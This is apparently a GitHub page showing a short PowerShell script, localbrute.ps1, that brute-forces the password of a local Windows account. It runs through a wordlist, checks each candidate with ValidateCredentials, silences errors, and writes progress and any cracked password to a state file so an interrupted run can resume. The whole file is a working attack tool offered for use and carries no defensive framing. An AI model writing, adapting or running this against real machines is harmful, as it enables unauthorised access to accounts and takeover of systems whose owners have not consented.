-
Notifications
You must be signed in to change notification settings - Fork 118
/
localbrute.ps1
31 lines (29 loc) · 1.04 KB
/
localbrute.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Function localbrute {
param($u,$dct,$debug)
$d = $dct -replace ".*\\" -replace ".*/"
$ErrorActionPreference = "SilentlyContinue"
$i = ((gc .\localbrute.state | sls "^${u}:.*:True:.*") -split(":"))[3]
if ($i) {
echo "Password for $u account already found: $i"
return
}
$ii = (gc .\localbrute.state | sls "^${u}:${d}:" | select -last 1) -split(":")
$i = $ii[2]/1
if ($debug) {echo "DEBUG: starting $d from $i"}
try {
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$t = [DirectoryServices.AccountManagement.ContextType]::Machine
$a = [DirectoryServices.AccountManagement.PrincipalContext]::new($t)
foreach($p in (gc $dct|where {$_.readcount -gt $i})) {
if ($debug) {echo "DEBUG: trying password [${i}]: $p"}
if ($a.ValidateCredentials($u,$p)) {
echo "${u}:${d}:True:${p}" >>localbrute.state
echo "Password for $u account found: $p"
return
}
$i++
}
} finally {
echo "${u}:${d}:${i}:${p}" >>localbrute.state
}
}